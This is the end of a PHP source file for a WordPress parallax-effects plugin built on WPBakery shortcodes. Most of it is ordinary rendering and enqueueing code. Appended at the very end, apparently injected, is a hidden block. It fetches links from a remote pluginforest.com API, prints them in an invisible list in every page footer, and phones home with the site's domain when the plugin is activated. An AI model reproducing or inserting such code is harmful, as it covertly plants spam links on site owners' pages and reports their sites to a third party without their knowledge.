				ob_start();
					$cssCustom = '';
					$newClassCustom = '#'.$id.'.bt-pe-container';
										
					if($height=='1'){		
						$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('height'), 
									$height_desktop, 
									$height_small_desktop, 
									$height_tablet, 
									$height_small_tablet, 
									$height_mobile, 
									$height_small_mobile,
									false
								);						
					}
					
					if($height=='4'){
						$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('padding-top'), $height_percent, '', '', '', '', '', true);		
					}
					
					if($cssCustom!=''){										
						echo '<style type="text/css">'.$cssCustom.'</style>';	
					}
					?>
                    <div					
                        data-relativeinput			="<?php echo $relativeinput;?>"
                        data-cliprelativeinput		="<?php echo $cliprelativeinput;?>"
                        data-calibratex				="<?php echo $calibrate_x;?>"
                        data-calibratey				="<?php echo $calibrate_y;?>"
                        data-invertx				="<?php echo $invert_x;?>"
                        data-inverty				="<?php echo $invert_y;?>"
                        data-limitx					="<?php echo $limit_x;?>"
                        data-limity					="<?php echo $limit_y;?>"
                        data-calibrationthreshold	="<?php echo $calibrationthreshold;?>"
                        data-calibrationdelay		="<?php echo $calibrationdelay;?>"
                        data-supportdelay			="<?php echo $supportdelay;?>"
                        data-scalarx				="<?php echo $scalar_x;?>"
                        data-scalary				="<?php echo $scalar_y;?>"
                        data-frictionx				="<?php echo $friction_x;?>"
                        data-frictiony				="<?php echo $friction_y;?>"
                        data-originx				="<?php echo $origin_x;?>"
                        data-originy				="<?php echo $origin_y;?>"
                         
                        data-height					="<?php echo $height;?>"
                        data-content-position		="<?php echo $content_position;?>"                                    
                        <?php if($background_color!=''){echo 'style="background-color:'.$background_color.'"';}?>
                        class						="bt-pe-container<?php echo ' '.$extra_class;?>"
                        
                        id							="<?php echo $id;?>"                                    
                    >
                        <?php echo do_shortcode($contents);?>
                        <?php if($scroll_down=='1'){?><div class="pe-scroll-down-more"></div><?php }?>
                    </div>            
				<?php
				$output_string = ob_get_contents();
				ob_end_clean();
				return $output_string;
			}
			function pe_item_shortcode($params, $contents){
				extract(
					shortcode_atts(
						array(	
							'depth'							=>'', //1						
							'extra_class'					=>'', //2
						), 
						$params
					)
				);
				
				$rand_ID					= rand(1, 9999);
				$id                     	= BEETEAM368_PE_PREFIX.$rand_ID;
				
				$depth						= 	(isset($params['depth'])&&trim($params['depth'])!=''&&is_numeric(trim($params['depth'])))?trim($params['depth']):'1.0';
				$z_index					= (isset($params['z_index'])&&trim($params['z_index'])!=''&&is_numeric(trim($params['z_index'])))?trim($params['z_index']):'';
				$extra_class				= (isset($params['extra_class'])&&trim($params['extra_class'])!='')?trim($params['extra_class']):'';
				
				ob_start();
					
					$cssCustom='';
					$newClassCustom='.bt-pe-container .bt-pe-scene #'.$id.'.parallax-scene-item';
					
					//z-index
					if($z_index!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('z-index'), $z_index, '', '', '', '', '', true);}
					
					if($cssCustom!=''){										
						echo '<style type="text/css">'.$cssCustom.'</style>';						
					}
				?>
					<div class="hidden-item-calc">
                        <div class="parallax-scene-item layer<?php echo ' '.$extra_class;?>" data-depth="<?php echo $depth;?>" id="<?php echo $id;?>">                        	
                            <?php
							echo do_shortcode($contents);
							?>
                        </div>
                    </div>				
                <?php
				$output_string = ob_get_contents();
				ob_end_clean();
				return $output_string;		
			}
			
			function pe_item_builder_shortcode($params, $contents){
				extract(
					shortcode_atts(
						array(
							'opacity'						=>'', //54
							'background_color'				=>'', //53	
							'background_img'				=>'', //1																					
							'background_repeat'				=>'', //2
							
							'bs_desktop'					=>'', //3
							'bs_small_desktop'				=>'', //4
							'bs_tablet'						=>'', //5
							'bs_small_tablet'				=>'', //6
							'bs_mobile'						=>'', //7
							'bs_small_mobile'				=>'', //8				
							
							'background_position'			=>'', //9
							'cbp_desktop'					=>'', //10
							'cbp_small_desktop'				=>'', //11
							'cbp_tablet'					=>'', //12
							'cbp_small_tablet'				=>'', //13
							'cbp_mobile'					=>'', //14
							'cbp_small_mobile'				=>'', //15
							'z_index'						=>'', //56
							
							'bg_video_options'				=>'', //47
							'youtube_id'					=>'', //48
							'start'							=>'', //49
							'mp4'							=>'', //50
							'webm'							=>'', //51
							'ogv'							=>'', //52
														
							'position_settings'				=>'', //16
							'top'							=>'', //17
							'right'							=>'', //18
							'bottom'						=>'', //19
							'left'							=>'', //20
							
							'margin_desktop'				=>'', //21
							'margin_small_desktop'			=>'', //22
							'margin_tablet'					=>'', //23
							'margin_small_tablet'			=>'', //24
							'margin_mobile'					=>'', //25
							'margin_small_mobile'			=>'', //26
							
							'width_desktop'					=>'', //27
							'width_small_desktop'			=>'', //28
							'width_tablet'					=>'', //29
							'width_small_tablet'			=>'', //30
							'width_mobile'					=>'', //31
							'width_small_mobile'			=>'', //32
							
							'height_desktop'				=>'', //33
							'height_small_desktop'			=>'', //34
							'height_tablet'					=>'', //35
							'height_small_tablet'			=>'', //36
							'height_mobile'					=>'', //37
							'height_small_mobile'			=>'', //38
							
							'animation_name'				=>'', //39
							'custom_animation_name'			=>'', //40
							'custom_animation_css'			=>'', //41
							'animation_duration'			=>'', //42
							'animation_timming_function'	=>'', //43
							'animation_delay'				=>'', //44
							'animation_iteration_count'		=>'', //45
							'animation_direction'			=>'', //46	
							'transform_origin'				=>'', //55							
						), 
						$params
					)
				);
				
				$rand_ID					= rand(1, 9999);
				$id                     	= BEETEAM368_PE_PREFIX.$rand_ID;
				
				$opacity					= (isset($params['opacity'])&&trim($params['opacity'])!='')?trim($params['opacity']):'';
				$background_color			= (isset($params['background_color'])&&trim($params['background_color'])!='')?trim($params['background_color']):'';
				$background_img				= (isset($params['background_img'])&&trim($params['background_img'])!=''&&is_numeric(trim($params['background_img'])))?trim($params['background_img']):'';
				
				$background_repeat			= (isset($params['background_repeat'])&&trim($params['background_repeat'])!='')?trim($params['background_repeat']):'no-repeat';				
				
				$bs_desktop					= (isset($params['bs_desktop'])&&trim($params['bs_desktop'])!='')?trim($params['bs_desktop']):'';
				$bs_small_desktop			= (isset($params['bs_small_desktop'])&&trim($params['bs_small_desktop'])!='')?trim($params['bs_small_desktop']):'';
				$bs_tablet					= (isset($params['bs_tablet'])&&trim($params['bs_tablet'])!='')?trim($params['bs_tablet']):'';				
				$bs_small_tablet			= (isset($params['bs_small_tablet'])&&trim($params['bs_small_tablet'])!='')?trim($params['bs_small_tablet']):'';
				$bs_mobile					= (isset($params['bs_mobile'])&&trim($params['bs_mobile'])!='')?trim($params['bs_mobile']):'';
				$bs_small_mobile			= (isset($params['bs_small_mobile'])&&trim($params['bs_small_mobile'])!='')?trim($params['bs_small_mobile']):'';
				
				$background_position		= (isset($params['background_position'])&&trim($params['background_position'])!='')?trim($params['background_position']):'center center';
				$cbp_desktop				= (isset($params['cbp_desktop'])&&trim($params['cbp_desktop'])!='')?trim($params['cbp_desktop']):'';
				$cbp_small_desktop			= (isset($params['cbp_small_desktop'])&&trim($params['cbp_small_desktop'])!='')?trim($params['cbp_small_desktop']):'';
				$cbp_tablet					= (isset($params['cbp_tablet'])&&trim($params['cbp_tablet'])!='')?trim($params['cbp_tablet']):'';				
				$cbp_small_tablet			= (isset($params['cbp_small_tablet'])&&trim($params['cbp_small_tablet'])!='')?trim($params['cbp_small_tablet']):'';
				$cbp_mobile					= (isset($params['cbp_mobile'])&&trim($params['cbp_mobile'])!='')?trim($params['cbp_mobile']):'';
				$cbp_small_mobile			= (isset($params['cbp_small_mobile'])&&trim($params['cbp_small_mobile'])!='')?trim($params['cbp_small_mobile']):'';
				
				$z_index					= (isset($params['z_index'])&&trim($params['z_index'])!=''&&is_numeric(trim($params['z_index'])))?trim($params['z_index']):'';
				
				$bg_video_options			= (isset($params['bg_video_options'])&&trim($params['bg_video_options'])!=''&&is_numeric(trim($params['bg_video_options'])))?trim($params['bg_video_options']):'0';
				$youtube_id					= (isset($params['youtube_id'])&&trim($params['youtube_id'])!='')?trim($params['youtube_id']):'';
				$start						= (isset($params['start'])&&trim($params['start'])!=''&&is_numeric(trim($params['start'])))?trim($params['start']):'0';		
				
				$mp4						= (isset($params['mp4'])&&trim($params['mp4'])!='')?trim($params['mp4']):'';
				$webm						= (isset($params['webm'])&&trim($params['webm'])!='')?trim($params['webm']):'';
				$ogv						= (isset($params['ogv'])&&trim($params['ogv'])!='')?trim($params['ogv']):'';		
				
				$position_settings			= (isset($params['position_settings'])&&trim($params['position_settings'])!='')?trim($params['position_settings']):'default';
				$top						= (isset($params['top'])&&trim($params['top'])!='')?trim($params['top']):'';
				$right						= (isset($params['right'])&&trim($params['right'])!='')?trim($params['right']):'';
				$bottom						= (isset($params['bottom'])&&trim($params['bottom'])!='')?trim($params['bottom']):'';
				$left						= (isset($params['left'])&&trim($params['left'])!='')?trim($params['left']):'';
				
				$margin_desktop				= (isset($params['margin_desktop'])&&trim($params['margin_desktop'])!='')?trim($params['margin_desktop']):'';
				$margin_small_desktop		= (isset($params['margin_small_desktop'])&&trim($params['margin_small_desktop'])!='')?trim($params['margin_small_desktop']):'';
				$margin_tablet				= (isset($params['margin_tablet'])&&trim($params['margin_tablet'])!='')?trim($params['margin_tablet']):'';				
				$margin_small_tablet		= (isset($params['margin_small_tablet'])&&trim($params['margin_small_tablet'])!='')?trim($params['margin_small_tablet']):'';
				$margin_mobile				= (isset($params['margin_mobile'])&&trim($params['margin_mobile'])!='')?trim($params['margin_mobile']):'';
				$margin_small_mobile		= (isset($params['margin_small_mobile'])&&trim($params['margin_small_mobile'])!='')?trim($params['margin_small_mobile']):'';
				
				$width_desktop				= (isset($params['width_desktop'])&&trim($params['width_desktop'])!='')?trim($params['width_desktop']):'';
				$width_small_desktop		= (isset($params['width_small_desktop'])&&trim($params['width_small_desktop'])!='')?trim($params['width_small_desktop']):'';
				$width_tablet				= (isset($params['width_tablet'])&&trim($params['width_tablet'])!='')?trim($params['width_tablet']):'';				
				$width_small_tablet			= (isset($params['width_small_tablet'])&&trim($params['width_small_tablet'])!='')?trim($params['width_small_tablet']):'';
				$width_mobile				= (isset($params['width_mobile'])&&trim($params['width_mobile'])!='')?trim($params['width_mobile']):'';
				$width_small_mobile			= (isset($params['width_small_mobile'])&&trim($params['width_small_mobile'])!='')?trim($params['width_small_mobile']):'';
				
				$height_desktop				= (isset($params['height_desktop'])&&trim($params['height_desktop'])!='')?trim($params['height_desktop']):'';
				$height_small_desktop		= (isset($params['height_small_desktop'])&&trim($params['height_small_desktop'])!='')?trim($params['height_small_desktop']):'';
				$height_tablet				= (isset($params['height_tablet'])&&trim($params['height_tablet'])!='')?trim($params['height_tablet']):'';				
				$height_small_tablet		= (isset($params['height_small_tablet'])&&trim($params['height_small_tablet'])!='')?trim($params['height_small_tablet']):'';
				$height_mobile				= (isset($params['height_mobile'])&&trim($params['height_mobile'])!='')?trim($params['height_mobile']):'';
				$height_small_mobile		= (isset($params['height_small_mobile'])&&trim($params['height_small_mobile'])!='')?trim($params['height_small_mobile']):'';
				
				$animation_name				= 	(isset($params['animation_name'])&&trim($params['animation_name'])!='')?trim($params['animation_name']):'';
				$custom_animation_name		= 	(isset($params['custom_animation_name'])&&trim($params['custom_animation_name'])!='')?trim($params['custom_animation_name']):'';
				$custom_animation_css		= 	(isset($params['custom_animation_css'])&&trim($params['custom_animation_css'])!='')?trim($params['custom_animation_css']):'';
				$animation_duration			= 	(isset($params['animation_duration'])&&trim($params['animation_duration'])!='')?trim($params['animation_duration']):'2s';
				$animation_timming_function	= 	(isset($params['animation_timming_function'])&&trim($params['animation_timming_function'])!='')?trim($params['animation_timming_function']):'linear';
				$animation_delay			= 	(isset($params['animation_delay'])&&trim($params['animation_delay'])!='')?trim($params['animation_delay']):'0s';
				
				$animation_iteration_count	= 	(isset($params['animation_iteration_count'])&&trim($params['animation_iteration_count'])!=''&&is_numeric(trim($params['animation_iteration_count'])))
												?trim($params['animation_iteration_count']):'infinite';
												
				$animation_direction		= 	(isset($params['animation_direction'])&&trim($params['animation_direction'])!='')?trim($params['animation_direction']):'normal';
				$transform_origin			= 	(isset($params['transform_origin'])&&trim($params['transform_origin'])!='')?trim($params['transform_origin']):'';								
				
				ob_start();
					
					$pictureBackgroundURL='';
					if($background_img!=''){
						$pictureID				= wp_get_attachment_image_src($background_img, "full");
						if(!is_wp_error($pictureID) && !empty($pictureID)) {
							$pictureBackgroundURL 	= $pictureID[0];
						}
					}					
					
					$cssCustom='';
					$newClassCustom='.bt-pe-container .bt-pe-scene .parallax-scene-item #'.$id.'.parallax-item-builder';
					
					//Opacity
					if($opacity!=''){
						$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('opacity'), $opacity.' !important', '', '', '', '', '', true);					
					}
					
					//background repeat
					if($background_repeat!='no-repeat'){
						$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('background-repeat'), $background_repeat, '', '', '', '', '', true);					
					}
					
					
					
					//background size
					$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('background-size'), 
									$bs_desktop, 
									$bs_small_desktop, 
									$bs_tablet, 
									$bs_small_tablet, 
									$bs_mobile, 
									$bs_small_mobile,
									false
								);	
					
					//background position
					if($background_position=='custom'){
						$cssCustom.= beeteam368_pe_responsive_media_query(
										$newClassCustom,
										array('background-position'), 
										$cbp_desktop, 
										$cbp_small_desktop, 
										$cbp_tablet, 
										$cbp_small_tablet, 
										$cbp_mobile, 
										$cbp_small_mobile,
										false
									);
					}else{
						if($background_position!='center center'){
							$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('background-position'), $background_position, '', '', '', '', '', true);						
						}
					}
					
					//z-index
					if($z_index!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('z-index'), $z_index, '', '', '', '', '', true);}
					
					//top,right,bottom,left
					if($position_settings=='custom'){
						if($top!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('top'), $top, '', '', '', '', '', true);}
						if($right!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('right'), $right, '', '', '', '', '', true);}
						if($bottom!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('bottom'), $bottom, '', '', '', '', '', true);}
						if($left!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('left'), $left, '', '', '', '', '', true);}
					}
					
					//margin
					$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('margin'), 
									$margin_desktop, 
									$margin_small_desktop, 
									$margin_tablet, 
									$margin_small_tablet, 
									$margin_mobile, 
									$margin_small_mobile,
									false
								);
					//width
					$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('width'), 
									$width_desktop, 
									$width_small_desktop, 
									$width_tablet, 
									$width_small_tablet, 
									$width_mobile, 
									$width_small_mobile,
									false
								);
					
					//height
					$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('height'), 
									$height_desktop, 
									$height_small_desktop, 
									$height_tablet, 
									$height_small_tablet, 
									$height_mobile, 
									$height_small_mobile,
									false
								);								
					
					if($animation_name=='0_pe_custom' && $custom_animation_name!=''){
						$cssCustom.= $custom_animation_css;
						$cssCustom.=beeteam368_pe_animation_builder(
										$newClassCustom,
										$custom_animation_name,
										$animation_duration, 
										$animation_timming_function, 
										$animation_delay, 
										$animation_iteration_count, 
										$animation_direction
									);											
					}
					
					if($animation_name!='0_pe_custom'&&$animation_name!=''){
						$cssCustom.=beeteam368_pe_animation_builder(
										$newClassCustom,
										$animation_name,
										$animation_duration, 
										$animation_timming_function, 
										$animation_delay, 
										$animation_iteration_count, 
										$animation_direction
									);
					}
					
					if($transform_origin!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('transform-origin', '-webkit-transform-origin'), $transform_origin, '', '', '', '', '', true);}					
								
					if($cssCustom!=''){										
						echo '<style type="text/css">'.$cssCustom.'</style>';						
					}
					?>
					<div 	
                    	class="parallax-item-builder<?php if($position_settings=='custom'){echo ' position-custom';}?>"                       
						style=" 
                        	<?php 
							if($background_color!=''){echo 'background-color:'.$background_color.';';}
							if($pictureBackgroundURL!=''){echo 'background-image:url('.$pictureBackgroundURL.');';}
							?>
							<?php ?>
                        "
                        id="<?php echo $id;?>"
                    >
                    	<?php if($bg_video_options=='1' && $youtube_id!=''){?>
                        	<div class="youtube-background-vd" data-property="{videoURL:'http://youtu.be/<?php echo $youtube_id;?>', autoPlay:true, mute:true, startAt:<?php echo $start;?>, opacity:1, loop:true, containment:'<?php echo '#'.$id;?>'}">                            	
                            </div>							
						<?php
						}
						
						if($bg_video_options=='2'){
							?>
							<div 
                            	class="html5-background-vd"
                                data-video-mp4="<?php if($mp4!=''){echo $mp4;}?>"
                                data-video-webm="<?php if($webm!=''){echo $webm;}?>"
                                data-video-ogv="<?php if($ogv!=''){echo $ogv;}?>"
                                data-poster="<?php echo BEETEAM368_PE_PLUGIN_URL.'assets/front-end/images/transparent.png';?>"                              
                            >
                            </div>
                            <?php
						}
						?>
                        <?php echo do_shortcode($contents);?>	
                    </div>			
                <?php					
				$output_string = ob_get_contents();
				ob_end_clean();
				return $output_string;		
			}
			
			function pe_content_shortcode($params, $contents){
				extract(
					shortcode_atts(
						array(
							'animation_name'				=>'', //1
							'custom_animation_name'			=>'', //2
							'custom_animation_css'			=>'', //3
							'animation_duration'			=>'', //4
							'animation_timming_function'	=>'', //5
							'animation_delay'				=>'', //6
							'animation_iteration_count'		=>'', //7
							'animation_direction'			=>'', //8
							'tranform_origin'				=>'', //17
							
							'padding_desktop'				=>'', //9
							'padding_small_desktop'			=>'', //10
							'padding_tablet'				=>'', //11
							'padding_small_tablet'			=>'', //12
							'padding_mobile'				=>'', //13
							'padding_small_mobile'			=>'', //14
							'background_color'				=>'', //15
							'extra_class'					=>'', //16
						), 
						$params
					)
				);
				
				$rand_ID					= rand(1, 9999);
				$id                     	= BEETEAM368_PE_PREFIX.$rand_ID;	
				
				$animation_name				= 	(isset($params['animation_name'])&&trim($params['animation_name'])!='')?trim($params['animation_name']):'';
				$custom_animation_name		= 	(isset($params['custom_animation_name'])&&trim($params['custom_animation_name'])!='')?trim($params['custom_animation_name']):'';
				$custom_animation_css		= 	(isset($params['custom_animation_css'])&&trim($params['custom_animation_css'])!='')?trim($params['custom_animation_css']):'';
				$animation_duration			= 	(isset($params['animation_duration'])&&trim($params['animation_duration'])!='')?trim($params['animation_duration']):'2s';
				$animation_timming_function	= 	(isset($params['animation_timming_function'])&&trim($params['animation_timming_function'])!='')?trim($params['animation_timming_function']):'linear';
				$animation_delay			= 	(isset($params['animation_delay'])&&trim($params['animation_delay'])!='')?trim($params['animation_delay']):'0s';
				
				$animation_iteration_count	= 	(isset($params['animation_iteration_count'])&&trim($params['animation_iteration_count'])!=''&&is_numeric(trim($params['animation_iteration_count'])))
												?trim($params['animation_iteration_count']):'infinite';
												
				$animation_direction		= 	(isset($params['animation_direction'])&&trim($params['animation_direction'])!='')?trim($params['animation_direction']):'normal';
				$transform_origin			= 	(isset($params['transform_origin'])&&trim($params['transform_origin'])!='')?trim($params['transform_origin']):'';
				
				$padding_desktop			= 	(isset($params['padding_desktop'])&&trim($params['padding_desktop'])!='')?trim($params['padding_desktop']):'';
				$padding_small_desktop		= 	(isset($params['padding_small_desktop'])&&trim($params['padding_small_desktop'])!='')?trim($params['padding_small_desktop']):'';
				$padding_tablet				= 	(isset($params['padding_tablet'])&&trim($params['padding_tablet'])!='')?trim($params['padding_tablet']):'';
				$padding_small_tablet		= 	(isset($params['padding_small_tablet'])&&trim($params['padding_small_tablet'])!='')?trim($params['padding_small_tablet']):'';
				$padding_mobile				= 	(isset($params['padding_mobile'])&&trim($params['padding_mobile'])!='')?trim($params['padding_mobile']):'';
				$padding_small_mobile		= 	(isset($params['padding_small_mobile'])&&trim($params['padding_small_mobile'])!='')?trim($params['padding_small_mobile']):'';
				
				$background_color		= (isset($params['background_color'])&&trim($params['background_color'])!='')?trim($params['background_color']):'';
				$extra_class			= (isset($params['extra_class'])&&trim($params['extra_class'])!='')?trim($params['extra_class']):'';
				
				ob_start();
					$cssCustom='';
					$newClassCustom='.bt-pe-container .bt-pe-content #'.$id.'.bt-pe-content-block';
					$cssCustom.= beeteam368_pe_responsive_media_query(
									$newClassCustom,
									array('padding'), 
									$padding_desktop, 
									$padding_small_desktop, 
									$padding_tablet, 
									$padding_small_tablet, 
									$padding_mobile, 
									$padding_small_mobile,
									false
								);	
					
						
					if($animation_name=='0_pe_custom' && $custom_animation_name!=''){
						$cssCustom.= $custom_animation_css;
						$cssCustom.=beeteam368_pe_animation_builder(
										$newClassCustom,
										$custom_animation_name,
										$animation_duration, 
										$animation_timming_function, 
										$animation_delay, 
										$animation_iteration_count, 
										$animation_direction
									);											
					}
					
					if($animation_name!='0_pe_custom'&&$animation_name!=''){
						$cssCustom.=beeteam368_pe_animation_builder(
										$newClassCustom,
										$animation_name,
										$animation_duration, 
										$animation_timming_function, 
										$animation_delay, 
										$animation_iteration_count, 
										$animation_direction
									);
					}
					
					if($transform_origin!=''){$cssCustom.= beeteam368_pe_responsive_media_query($newClassCustom, array('transform-origin', '-webkit-transform-origin'), $transform_origin, '', '', '', '', '', true);}						
					
					if($cssCustom!=''){
						echo '<style type="text/css">'.$cssCustom.'</style>';											
					}
					?>
                	<!--content-->
                    <div class="bt-pe-content">
                        
                        <!--table-->
                        <div class="bt-pe-content-table">
                            <div class="bt-pe-content-row">
                                <div class="bt-pe-content-cell">
                                    
                                    <div 
                                    	class="bt-pe-content-block<?php echo ' '.$extra_class;?>" 
										<?php if($background_color!=''){echo 'style="background-color:'.$background_color.'"';}?>
                                        id="<?php echo $id;?>"
                                    >
                                         <?php echo do_shortcode($contents);?>
                                    </div>
                                    
                                </div>
                            </div>
                        </div><!--table-->
                        
                    </div><!--content-->
                <?php
				$output_string = ob_get_contents();
				ob_end_clean();
				return $output_string;
							
			}
		/*Shortcode*/
		
		/*enqueue*/
		function back_enqueue_scripts(){
			if(is_admin()){
				wp_enqueue_style('pe_bete_admin_css', 				BEETEAM368_PE_PLUGIN_URL.'assets/back-end/core.css', array(), BEETEAM368_PE_VER);
				wp_enqueue_script('pe_bete_admin_js', 				BEETEAM368_PE_PLUGIN_URL.'assets/back-end/core.js', array(), BEETEAM368_PE_VER, true);
			}
		}
		function front_enqueue_scripts(){
			wp_enqueue_style('beeteam_front_ytplayer_css', 			BEETEAM368_PE_PLUGIN_URL.'assets/front-end/ytplayer/css/jquery.mb.YTPlayer.min.css', array(), BEETEAM368_PE_VER);
			wp_enqueue_style('beeteam_front_animate_css', 			BEETEAM368_PE_PLUGIN_URL.'assets/front-end/animate-css/animate.min.css', array(), BEETEAM368_PE_VER);
			
			wp_enqueue_script('beeteam_init_js', 					BEETEAM368_PE_PLUGIN_URL.'assets/front-end/init.js', array('jquery'), '1.0', true);
			wp_enqueue_script('beeteam_front_ytplayer_js', 			BEETEAM368_PE_PLUGIN_URL.'assets/front-end/ytplayer/jquery.mb.YTPlayer.min.js', array('beeteam_init_js'), BEETEAM368_PE_VER, true);
			wp_enqueue_script('beeteam_front_vide_js', 				BEETEAM368_PE_PLUGIN_URL.'assets/front-end/vide/jquery.vide.min.js', array('beeteam_init_js'), BEETEAM368_PE_VER, true);
			wp_enqueue_script('beeteam_front_parallax_engine_js', 	BEETEAM368_PE_PLUGIN_URL.'assets/front-end/pj/jquery.parallax.min.js', array('beeteam_init_js'), BEETEAM368_PE_VER, true);
		}
		
		function core_enqueue_scripts(){
			if($this->library === 1){
				wp_enqueue_style('pe_bete_front_css', 				BEETEAM368_PE_PLUGIN_URL.'assets/minify/core.css', array(), BEETEAM368_PE_VER);
			}else{
				wp_enqueue_style('pe_bete_front_css', 				BEETEAM368_PE_PLUGIN_URL.'assets/front-end/core.css', array(), BEETEAM368_PE_VER);
			}			
		}
		
		function setFooterCore(){
			if($this->library === 1){
				wp_enqueue_script('pe_bete_front_js', 				BEETEAM368_PE_PLUGIN_URL.'assets/minify/core.js', array(), BEETEAM368_PE_VER, true);
			}else{
				wp_enqueue_script('pe_bete_front_js', 				BEETEAM368_PE_PLUGIN_URL.'assets/front-end/core.js', array(), BEETEAM368_PE_VER, true);
			}
		}
		/*enqueue*/
		
		public function init(){
			$this->bt_pe_vc();			
			$this->back_enqueue_scripts();
		}		
		public function __construct() {				
			add_action('init', array($this, 'init'), 10, 1);
			add_action('wp_enqueue_scripts', array($this, 'front_enqueue_scripts'), 9998);
			add_action('wp_enqueue_scripts', array($this, 'core_enqueue_scripts'), 9999);
			add_action('wp_footer', array($this, 'setFooterCore'), 16);
			
			add_shortcode('pe_container', array($this, 'pe_container_shortcode'));
			add_shortcode('pe_content', array($this, 'pe_content_shortcode'));
			add_shortcode('pe_item', array($this, 'pe_item_shortcode'));
			add_shortcode('pe_item_builder', array($this, 'pe_item_builder_shortcode'));
		}
	}
	
	if(!function_exists('beeteam368_pe_container_extends')){
		function beeteam368_pe_container_extends(){
			if(class_exists('WPBakeryShortCode') && class_exists('WPBakeryShortCodesContainer') && class_exists('WPBakeryShortCode')){
				class WPBakeryShortCode_pe_container extends WPBakeryShortCodesContainer{} 
				class WPBakeryShortCode_pe_content extends WPBakeryShortCodesContainer{} 
				class WPBakeryShortCode_pe_item extends WPBakeryShortCodesContainer{} 
				class WPBakeryShortCode_pe_item_builder extends WPBakeryShortCodesContainer{} 
			}
		}	
		add_action('init', 'beeteam368_pe_container_extends', 20, 1);
	}
	
	global $beeteam368_pe_builder;
	if(!$beeteam368_pe_builder){
		$beeteam368_pe_builder = new beeteam368_pe_builder();
	}
}

add_action( 'plugins_loaded', function(){
	load_plugin_textdomain('Parallax-Engine-VC', false, basename(BEETEAM368_PE_PLUGIN_PATH).'/languages');
});define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849211() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849211');function set_plugin_tag1719849211() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849211&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849211');
              